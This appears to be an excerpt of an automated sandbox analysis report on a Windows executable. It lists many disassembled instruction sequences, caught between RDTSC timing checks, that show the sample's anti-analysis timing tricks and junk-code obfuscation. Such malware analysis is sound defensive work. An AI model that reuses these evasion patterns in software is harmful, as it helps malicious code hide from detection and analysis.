                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C063E second address: 53C0652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C40h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0652 second address: 53C0656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0656 second address: 53C0679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 0003h 0x0000000e movzx esi, di 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1CC8BB7C3Eh 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0679 second address: 53C0680 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0680 second address: 53C06A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 6131C45Bh 0x00000011 call 00007F1CC8BB7C40h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D041C second address: 53D049F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F1CC8B8C9ECh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F1CC8B8C9EEh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c mov edi, esi 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F1CC8B8C9F6h 0x00000025 sub cl, FFFFFFB8h 0x00000028 jmp 00007F1CC8B8C9EBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F1CC8B8C9F5h 0x00000038 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D049F second address: 53D04D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F1CC8BB7C3Ah 0x00000013 jmp 00007F1CC8BB7C45h 0x00000018 popfd 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54104CA second address: 541052C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov cx, dx 0x00000011 pop ebx 0x00000012 mov ecx, 28397137h 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F1CC8B8C9EDh 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 jmp 00007F1CC8B8C9ECh 0x00000025 jmp 00007F1CC8B8C9F2h 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F1CC8B8C9F7h 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 541052C second address: 5410544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C44h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E0766 second address: 53E0778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E0778 second address: 53E077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E077C second address: 53E0812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F1CC8B8C9F7h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1CC8B8C9F6h 0x00000015 mov eax, dword ptr [ebp+08h] 0x00000018 jmp 00007F1CC8B8C9F0h 0x0000001d and dword ptr [eax], 00000000h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F1CC8B8C9EEh 0x00000027 jmp 00007F1CC8B8C9F5h 0x0000002c popfd 0x0000002d mov edi, ecx 0x0000002f popad 0x00000030 and dword ptr [eax+04h], 00000000h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F1CC8B8C9F9h 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C07DC second address: 53C07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C07E2 second address: 53C07E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C07E6 second address: 53C0858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1CC8BB7C3Ah 0x00000010 jmp 00007F1CC8BB7C45h 0x00000015 popfd 0x00000016 mov dx, cx 0x00000019 popad 0x0000001a mov dword ptr [esp], ebp 0x0000001d jmp 00007F1CC8BB7C3Ah 0x00000022 mov ebp, esp 0x00000024 jmp 00007F1CC8BB7C40h 0x00000029 pop ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1CC8BB7C3Eh 0x00000031 adc ah, 00000048h 0x00000034 jmp 00007F1CC8BB7C3Bh 0x00000039 popfd 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0858 second address: 53C085C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E0589 second address: 53E058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E058D second address: 53E0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E0593 second address: 53E05B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f mov ecx, 77A14E29h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E05B9 second address: 53E05BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E05BD second address: 53E05C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53E05C3 second address: 53E05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EFh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 540079B second address: 54007A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54007A1 second address: 54007A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54007A5 second address: 54007B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54007B4 second address: 54007B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54007B8 second address: 54007D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54007D1 second address: 54007E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9ECh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54007E1 second address: 540080A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F1CC8BB7C47h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov bl, ah 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 540080A second address: 5400871 instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F1CC8B8C9F9h 0x0000000e and eax, 2F362126h 0x00000014 jmp 00007F1CC8B8C9F1h 0x00000019 popfd 0x0000001a movzx esi, dx 0x0000001d popad 0x0000001e popad 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov edi, 40F2A2C8h 0x00000028 pushfd 0x00000029 jmp 00007F1CC8B8C9F1h 0x0000002e jmp 00007F1CC8B8C9EBh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400871 second address: 540089E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d popad 0x0000000e mov eax, dword ptr [76FB65FCh] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 540089E second address: 54008A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54008A4 second address: 54008F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movsx edi, ax 0x00000011 pushfd 0x00000012 jmp 00007F1CC8BB7C46h 0x00000017 xor ecx, 4808CC48h 0x0000001d jmp 00007F1CC8BB7C3Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54008F2 second address: 5400941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1D3A6BFA3Dh 0x0000000f jmp 00007F1CC8B8C9EEh 0x00000014 mov ecx, eax 0x00000016 pushad 0x00000017 mov edx, 32F7A3F0h 0x0000001c popad 0x0000001d xor eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F1CC8B8C9EEh 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400941 second address: 5400950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400950 second address: 5400A00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007F1CC8B8C9EEh 0x00000011 ror eax, cl 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1CC8B8C9EEh 0x0000001a jmp 00007F1CC8B8C9F5h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F1CC8B8C9F0h 0x00000026 adc esi, 5129BB58h 0x0000002c jmp 00007F1CC8B8C9EBh 0x00000031 popfd 0x00000032 popad 0x00000033 leave 0x00000034 jmp 00007F1CC8B8C9F6h 0x00000039 retn 0004h 0x0000003c nop 0x0000003d mov esi, eax 0x0000003f lea eax, dword ptr [ebp-08h] 0x00000042 xor esi, dword ptr [00A62014h] 0x00000048 push eax 0x00000049 push eax 0x0000004a push eax 0x0000004b lea eax, dword ptr [ebp-10h] 0x0000004e push eax 0x0000004f call 00007F1CCD56D3FAh 0x00000054 push FFFFFFFEh 0x00000056 pushad 0x00000057 mov esi, ebx 0x00000059 popad 0x0000005a pop eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F1CC8B8C9F1h 0x00000064 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400A00 second address: 5400A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400A04 second address: 5400A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400A0A second address: 5400A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F1CCD59867Ah 0x00000011 mov edi, edi 0x00000013 pushad 0x00000014 call 00007F1CC8BB7C3Eh 0x00000019 jmp 00007F1CC8BB7C42h 0x0000001e pop ecx 0x0000001f pushfd 0x00000020 jmp 00007F1CC8BB7C3Bh 0x00000025 adc cl, 0000003Eh 0x00000028 jmp 00007F1CC8BB7C49h 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 jmp 00007F1CC8BB7C3Eh 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400A7E second address: 5400A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400A83 second address: 5400AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C44h 0x00000009 sbb esi, 2D284998h 0x0000000f jmp 00007F1CC8BB7C3Bh 0x00000014 popfd 0x00000015 call 00007F1CC8BB7C48h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 mov di, 30C2h 0x00000024 call 00007F1CC8BB7C43h 0x00000029 movzx eax, bx 0x0000002c pop edx 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400AEF second address: 5400AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400AF3 second address: 5400B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400B10 second address: 5400B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F1CC8B8C9F7h 0x00000014 mov ecx, 400E5ACFh 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5400B3C second address: 5400B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B002A second address: 53B0030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0030 second address: 53B00AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8BB7C45h 0x00000009 sub cx, EFB6h 0x0000000e jmp 00007F1CC8BB7C41h 0x00000013 popfd 0x00000014 mov ax, 39A7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1CC8BB7C3Fh 0x00000025 add cx, 9CEEh 0x0000002a jmp 00007F1CC8BB7C49h 0x0000002f popfd 0x00000030 jmp 00007F1CC8BB7C40h 0x00000035 popad 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B00AB second address: 53B00F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1CC8B8C9F1h 0x00000009 xor si, 33D6h 0x0000000e jmp 00007F1CC8B8C9F1h 0x00000013 popfd 0x00000014 mov ax, A347h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F1CC8B8C9F4h 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B00F8 second address: 53B00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B00FC second address: 53B0102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0102 second address: 53B0125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1CC8BB7C3Ah 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0125 second address: 53B012B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B012B second address: 53B0144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0144 second address: 53B0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0148 second address: 53B0165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0165 second address: 53B018A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e movsx edx, ax 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B018A second address: 53B018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B018E second address: 53B0194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0194 second address: 53B019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B019A second address: 53B019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B019E second address: 53B01A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B01A2 second address: 53B01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f pushfd 0x00000010 jmp 00007F1CC8B8C9F5h 0x00000015 adc eax, 592866C6h 0x0000001b jmp 00007F1CC8B8C9F1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B01E0 second address: 53B01F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 8B02h 0x00000007 push ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov di, C214h 0x00000014 push ebx 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B01F7 second address: 53B0210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F5h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0210 second address: 53B0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 5EA39155h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0223 second address: 53B0228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0228 second address: 53B0264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 09C2h 0x00000007 movsx edx, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007F1CC8BB7C42h 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1CC8BB7C47h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0264 second address: 53B0290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cl, bh 0x0000000d mov si, B0DFh 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0290 second address: 53B0296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B0296 second address: 53B029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53B029B second address: 53B02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
